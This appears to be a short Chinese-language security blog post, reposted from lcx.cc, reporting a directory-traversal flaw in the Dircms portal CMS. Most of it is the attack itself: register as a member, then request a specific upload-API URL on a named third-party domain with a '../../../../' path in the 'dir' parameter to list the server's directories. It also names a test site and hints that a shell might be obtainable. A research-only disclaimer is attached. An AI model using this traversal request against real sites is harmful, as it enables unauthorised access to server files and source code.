今天在A5找到 dircms,商业版那个叫贵吖,又不安全,不知道是不是就一个程序员,一个客服的小公司。
挖到一个遍历目录
貌似还有地方可以拿shell晚上回家测试
刚刚百度,乌云貌似是12号有提交
不过还没有公开所以不算抄袭。
地址:http://www.wooyun.org/bugs/wooyun-2010-09537
测试网站:http://www.tengzhou0632.com
先注册会员
然后打开EXP:http://madman.in/api/upload/index.php?action=list_image&objid=image_api_image&dir=9d4c2f636f067f89../../../../
然后目录就全部爆出来了,喜欢的自己下载源码去研究。有免费版的。
下载地址:http://down.chinaz.com/soft/27402.htm
留言评论(旧系统):
文章来源于lcx.cc:Dircms门户系统遍历目录漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论